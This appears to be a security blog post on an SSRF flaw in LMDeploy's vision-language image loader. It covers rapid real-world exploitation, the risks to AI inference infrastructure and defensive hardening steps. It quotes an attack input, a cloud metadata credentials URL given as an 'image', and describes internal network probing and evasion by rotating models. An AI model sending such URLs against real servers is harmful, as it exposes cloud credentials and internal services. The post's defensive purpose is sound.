13 Hours From Disclosure to Live Exploit: LMDeploy CVE-2026-33626 Is the AI Supply Chain's Wake-Up Call

On April 23, 2026, the maintainers of LMDeploy — an open-source toolkit for compressing, deploying and serving large language models — published GitHub Security Advisory CVE-2026-33626. The flaw, a Server-Side Request Forgery (SSRF) in the vision-language module's load_image() function, allows the model server to fetch arbitrary URLs without validating internal/private IP addresses. CVSS 7.5. Affected: every version supporting vision-language up to and including 0.12.0.

12 hours and 31 minutes later, Sysdig's honeypot caught the first live exploitation attempt. Within 13 hours of publication, real attackers were running the exploit against real targets in the wild. By the time most security teams in Asia and Europe had finished their morning standup, the bug had already been weaponized.

Why this one matters more than a typical SSRF

Pure SSRF on a normal web server is annoying. SSRF on a vision-LLM inference node is potentially catastrophic. Three reasons.

First, where these things run. LMDeploy nodes typically sit on GPU instances on cloud providers. Those instances are usually attached to IAM roles broad enough to access S3, KMS, internal APIs, and the cloud's instance metadata service (IMDS). One successful IMDS fetch can hand an attacker temporary credentials that compromise the entire cloud account.

Second, how the SSRF gets triggered. The attacker simply submits a vision-language inference request with a URL pointing at an internal target. The image loader dutifully fetches it. There is no exotic exploit chain. There is no memory corruption. It is the model server doing exactly what it was built to do — load an image — only the "image" happens to be http://169.254.169.254/latest/meta-data/iam/security-credentials/.

Third, the operational profile. Sysdig's telemetry from one observed eight-minute session shows the attacker using the SSRF as a generic HTTP probe to scan the internal network: AWS IMDS, Redis, MySQL, an internal admin HTTP service, and an out-of-band DNS exfiltration endpoint. Requests rotated between vision-language models like internlm-xcomposer2 and OpenGVLab/InternVL2-8B to evade simplistic detection. This was not a curious researcher. This was tooling.

What it tells us about the AI supply chain

CVE-2026-33626 is the first real-world public datapoint that the AI inference layer is now being treated like every other internet-facing service: scanned, fingerprinted, and exploited within hours of disclosure.

For most of 2024-2025, AI security conversations were dominated by prompt injection, jailbreaks, and training-data poisoning. Real attackers don't care about any of that yet. They care about the same thing they always care about: an unauthenticated HTTP fetcher that runs on a privileged host. LMDeploy gave them one. So have several other inference frameworks audited in the wake of this disclosure (Triton's Python backend, vLLM's batch endpoints, Ollama's older versions before 0.6).

The grim implication is that the AI inference layer of 2026 looks a lot like the WordPress plugin ecosystem of 2014: shipping fast, mostly written by ML researchers rather than security engineers, with file fetchers and template engines that pre-date a serious threat model.

My take and an action list

The thing security teams should internalize from this incident is the 13-hour number. Not because that's unusually fast — it isn't, in 2026. The point is that the response window for AI infrastructure is the same as for web servers and edge proxies, and most organizations are not yet treating it that way. AI infrastructure is sitting in a separate Slack channel, behind a separate on-call rotation, with a separate (and less mature) patch cadence.

If you run inference servers in production, this week:

Audit every model-serving container's egress policy. Default-deny outbound. If an inference container needs internet, allow only the specific model registry it pulls from.

Strip IMDS access from GPU inference nodes. Use IMDSv2 with hop-limit 1 at minimum. Better, run inference on instance roles whose only permission is "read this one model bucket."

Move your AI inference servers under the same vulnerability-management SLA as your web tier. Same scanners, same on-call, same exploit-window targets.

Treat any image-loader, document-loader, or "fetch URL on behalf of the model" function as a security boundary. Validate the URL. Block private IP ranges. Block link-local addresses. Block your own VPC's CIDR.

We crossed a threshold this week. AI inference is no longer a research-grade concern that lives off the side of the production network. It's production. Protect it accordingly.